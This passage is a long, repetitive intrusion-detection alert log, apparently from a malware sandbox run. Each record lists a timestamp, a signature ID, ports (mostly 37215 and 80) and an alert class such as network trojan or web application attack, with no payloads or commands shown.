              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.084991
              SID:2025883
              Source Port:58912
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:06/10/24-15:38:00.013509
              SID:2829579
              Source Port:52976
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.298942
              SID:2030092
              Source Port:49900
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/10/24-15:38:00.270805
              SID:2829579
              Source Port:57758
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:37:59.943220
              SID:2835222
              Source Port:34092
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.833196
              SID:2835222
              Source Port:56460
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:00.008957
              SID:2829579
              Source Port:36608
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.653727
              SID:2829579
              Source Port:38800
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.819947
              SID:2835222
              Source Port:46090
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.877070
              SID:2829579
              Source Port:54630
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:37:59.954562
              SID:2835222
              Source Port:33990
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:37:59.753726
              SID:2030092
              Source Port:58648
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/10/24-15:38:02.123851
              SID:2030092
              Source Port:46196
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/10/24-15:38:00.255183
              SID:2835222
              Source Port:55170
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:37:59.981701
              SID:2829579
              Source Port:41120
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:00.209800
              SID:2829579
              Source Port:46028
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:37:59.944688
              SID:2829579
              Source Port:46644
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:37:59.863643
              SID:2025883
              Source Port:43232
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:06/10/24-15:38:02.149120
              SID:2030092
              Source Port:58634
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/10/24-15:38:02.846884
              SID:2835222
              Source Port:53768
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.119333
              SID:2030092
              Source Port:35946
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/10/24-15:37:59.776818
              SID:2030092
              Source Port:59898
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/10/24-15:38:00.010670
              SID:2835222
              Source Port:54964
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.810751
              SID:2835222
              Source Port:53740
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:37:59.991203
              SID:2835222
              Source Port:52860
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.789775
              SID:2835222
              Source Port:51240
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:37:59.815835
              SID:2025883
              Source Port:53776
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:06/10/24-15:38:02.095481
              SID:2025883
              Source Port:57206
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:06/10/24-15:38:02.791154
              SID:2829579
              Source Port:34792
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.250043
              SID:2030092
              Source Port:44254
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/10/24-15:38:00.224097
              SID:2829579
              Source Port:47094
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.864253
              SID:2829579
              Source Port:47112
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:37:59.979091
              SID:2835222
              Source Port:45156
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.688716
              SID:2835222
              Source Port:42320
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.671087
              SID:2829579
              Source Port:45274
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:00.161493
              SID:2829579
              Source Port:33540
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.104496
              SID:2030092
              Source Port:44402
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/10/24-15:38:00.189175
              SID:2835222
              Source Port:58464
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.648657
              SID:2829579
              Source Port:44284
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:00.221508
              SID:2829579
              Source Port:54140
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.765712
              SID:2829579
              Source Port:42732
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:37:59.790906
              SID:2030092
              Source Port:41002
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/10/24-15:38:00.008064
              SID:2829579
              Source Port:39324
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:00.026295
              SID:2829579
              Source Port:43020
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.087126
              SID:2030092
              Source Port:38432
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/10/24-15:38:00.176046
              SID:2829579
              Source Port:41532
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.721224
              SID:2829579
              Source Port:38284
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.197579
              SID:2030092
              Source Port:45966
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/10/24-15:38:02.154888
              SID:2030092
              Source Port:51870
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/10/24-15:37:59.992068
              SID:2829579
              Source Port:49128
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:00.029158
              SID:2829579
              Source Port:34938
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:37:59.800000
              SID:2030092
              Source Port:42016
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/10/24-15:37:59.976497
              SID:2835222
              Source Port:34932
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.307423
              SID:2030092
              Source Port:42506
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/10/24-15:38:00.211497
              SID:2829579
              Source Port:45922
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:00.210637
              SID:2835222
              Source Port:50210
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.188001
              SID:2030092
              Source Port:35812
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/10/24-15:38:02.830775
              SID:2829579
              Source Port:37174
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.092323
              SID:2025883
              Source Port:38082
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:06/10/24-15:38:00.258740
              SID:2829579
              Source Port:53884
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.739622
              SID:2829579
              Source Port:58650
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.779348
              SID:2829579
              Source Port:39560
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.126147
              SID:2030092
              Source Port:41096
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/10/24-15:37:59.836086
              SID:2025883
              Source Port:40004
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:06/10/24-15:38:00.192522
              SID:2829579
              Source Port:48172
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.683936
              SID:2835222
              Source Port:59854
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:00.022727
              SID:2829579
              Source Port:38164
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.907506
              SID:2835222
              Source Port:51602
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.664556
              SID:2829579
              Source Port:42468
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:37:59.973058
              SID:2829579
              Source Port:56350
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:00.193999
              SID:2829579
              Source Port:43578
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.227858
              SID:2030092
              Source Port:49684
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/10/24-15:38:02.214505
              SID:2030092
              Source Port:35392
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/10/24-15:38:02.650837
              SID:2835222
              Source Port:42044
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.112951
              SID:2030092
              Source Port:52482
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/10/24-15:38:02.925765
              SID:2835222
              Source Port:55820
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:37:59.964618
              SID:2829579
              Source Port:54370
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:37:59.845254
              SID:2025883
              Source Port:60926
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:06/10/24-15:38:02.203124
              SID:2030092
              Source Port:52872
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/10/24-15:37:59.958705
              SID:2829579
              Source Port:44164
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.637710
              SID:2835222
              Source Port:50306
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.147810
              SID:2030092
              Source Port:58770
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/10/24-15:38:02.649435
              SID:2829579
              Source Port:44504
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:37:59.747937
              SID:2025883
              Source Port:32824
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:06/10/24-15:38:00.253813
              SID:2835222
              Source Port:43078
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:37:59.945412
              SID:2835222
              Source Port:53768
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.811819
              SID:2835222
              Source Port:49442
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:00.218073
              SID:2835222
              Source Port:45262
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:00.274014
              SID:2829579
              Source Port:59706
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:00.181485
              SID:2829579
              Source Port:48948
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.132768
              SID:2030092
              Source Port:45504
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/10/24-15:38:02.752803
              SID:2829579
              Source Port:57264
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.101873
              SID:2030092
              Source Port:44802
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/10/24-15:38:00.003802
              SID:2829579
              Source Port:33756
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:00.021324
              SID:2829579
              Source Port:51562
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:37:59.864921
              SID:2025883
              Source Port:37108
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:06/10/24-15:38:02.106417
              SID:2030092
              Source Port:52408
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/10/24-15:38:00.002137
              SID:2835222
              Source Port:54402
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.233253
              SID:2030092
              Source Port:37170
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/10/24-15:37:59.788491
              SID:2025883
              Source Port:46042
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:06/10/24-15:38:02.501600
              SID:2829579
              Source Port:58548
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.505632
              SID:2835222
              Source Port:42276
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.710308
              SID:2829579
              Source Port:50128
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:37:59.948276
              SID:2835222
              Source Port:46442
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.123264
              SID:2030092
              Source Port:40360
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/10/24-15:38:02.792332
              SID:2835222
              Source Port:51254
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.843717
              SID:2835222
              Source Port:50194
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:00.177056
              SID:2829579
              Source Port:39800
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.865201
              SID:2829579
              Source Port:38730
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.157293
              SID:2030092
              Source Port:55846
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/10/24-15:38:02.502931
              SID:2829579
              Source Port:46240
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:00.184599
              SID:2835222
              Source Port:59998
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.788817
              SID:2829579
              Source Port:56284
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:00.037044
              SID:2829579
              Source Port:33786
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:37:59.806758
              SID:2025883
              Source Port:40556
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:06/10/24-15:38:00.273128
              SID:2835222
              Source Port:42026
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.195196
              SID:2030092
              Source Port:38620
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/10/24-15:37:59.781384
              SID:2025883
              Source Port:37506
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:06/10/24-15:38:02.492497
              SID:2829579
              Source Port:46236
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:37:59.990322
              SID:2829579
              Source Port:37196
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.786162
              SID:2835222
              Source Port:52216
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.875172
              SID:2835222
              Source Port:45636
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:00.234498
              SID:2835222
              Source Port:43084
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.122172
              SID:2030092
              Source Port:60888
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/10/24-15:38:02.297540
              SID:2030092
              Source Port:48660
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/10/24-15:38:00.257346
              SID:2829579
              Source Port:32950
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.653315
              SID:2829579
              Source Port:57296
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.878023
              SID:2829579
              Source Port:59264
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.695812
              SID:2829579
              Source Port:42650
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.325384
              SID:2030092
              Source Port:60416
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/10/24-15:38:02.934901
              SID:2835222
              Source Port:34102
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.159318
              SID:2030092
              Source Port:41816
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/10/24-15:38:02.681567
              SID:2829579
              Source Port:35328
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.713903
              SID:2829579
              Source Port:50702
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:37:59.941006
              SID:2829579
              Source Port:33514
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.715141
              SID:2835222
              Source Port:46712
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:00.246351
              SID:2835222
              Source Port:41150
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:00.261547
              SID:2835222
              Source Port:51604
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.813306
              SID:2835222
              Source Port:50454
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.304825
              SID:2030092
              Source Port:37678
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/10/24-15:38:02.641973
              SID:2835222
              Source Port:57774
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:00.196297
              SID:2835222
              Source Port:48942
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.702109
              SID:2835222
              Source Port:44722
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.767730
              SID:2829579
              Source Port:59890
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:37:59.795427
              SID:2030092
              Source Port:37488
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/10/24-15:38:00.243948
              SID:2835222
              Source Port:38516
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.498091
              SID:2835222
              Source Port:49488
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:37:59.849795
              SID:2030092
              Source Port:49620
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/10/24-15:38:02.932450
              SID:2829579
              Source Port:33406
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:37:59.955351
              SID:2829579
              Source Port:36294
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:00.175015
              SID:2829579
              Source Port:56568
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:00.179072
              SID:2829579
              Source Port:50148
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.243843
              SID:2030092
              Source Port:56706
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/10/24-15:38:02.669182
              SID:2829579
              Source Port:36132
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.732625
              SID:2835222
              Source Port:45998
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:37:59.949732
              SID:2835222
              Source Port:59100
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.645712
              SID:2835222
              Source Port:43262
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.787074
              SID:2835222
              Source Port:56392
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:00.190024
              SID:2835222
              Source Port:46504
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.217969
              SID:2030092
              Source Port:41204
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/10/24-15:37:59.809084
              SID:2030092
              Source Port:35328
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/10/24-15:37:59.856619
              SID:2025883
              Source Port:43560
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:06/10/24-15:38:02.175938
              SID:2030092
              Source Port:34330
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/10/24-15:38:02.508359
              SID:2835222
              Source Port:58330
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:37:59.868776
              SID:2025883
              Source Port:42046
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:06/10/24-15:38:00.007220
              SID:2829579
              Source Port:53538
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.724796
              SID:2829579
              Source Port:52760
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:37:59.772200
              SID:2030092
              Source Port:49156
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/10/24-15:38:00.197151
              SID:2829579
              Source Port:48674
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.233909
              SID:2030092
              Source Port:60900
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/10/24-15:38:00.247270
              SID:2829579
              Source Port:59752
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:37:59.969655
              SID:2829579
              Source Port:49034
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:37:59.981701
              SID:2835222
              Source Port:41120
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.226488
              SID:2030092
              Source Port:54626
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/10/24-15:38:02.703161
              SID:2829579
              Source Port:45526
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:37:59.950533
              SID:2829579
              Source Port:38960
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:37:59.977354
              SID:2835222
              Source Port:60878
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.816370
              SID:2835222
              Source Port:56330
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:00.213146
              SID:2835222
              Source Port:44874
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.165236
              SID:2030092
              Source Port:53942
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/10/24-15:38:00.000374
              SID:2835222
              Source Port:42520
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.186210
              SID:2030092
              Source Port:52934
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/10/24-15:38:00.205114
              SID:2835222
              Source Port:43116
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:00.008957
              SID:2835222
              Source Port:36608
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.640548
              SID:2829579
              Source Port:52172
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:37:59.930930
              SID:2829579
              Source Port:32834
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:00.168829
              SID:2829579
              Source Port:60102
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.831855
              SID:2829579
              Source Port:49014
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.196419
              SID:2030092
              Source Port:58088
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/10/24-15:38:02.819947
              SID:2829579
              Source Port:46090
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.490299
              SID:2829579
              Source Port:54648
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:00.172951
              SID:2829579
              Source Port:57678
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.197003
              SID:2030092
              Source Port:55228
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/10/24-15:38:02.650127
              SID:2829579
              Source Port:36866
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.698008
              SID:2835222
              Source Port:42586
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.839299
              SID:2829579
              Source Port:57412
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.091217
              SID:2025883
              Source Port:55178
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:06/10/24-15:38:00.219730
              SID:2835222
              Source Port:46594
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.725896
              SID:2829579
              Source Port:50012
              Destination Port:37215
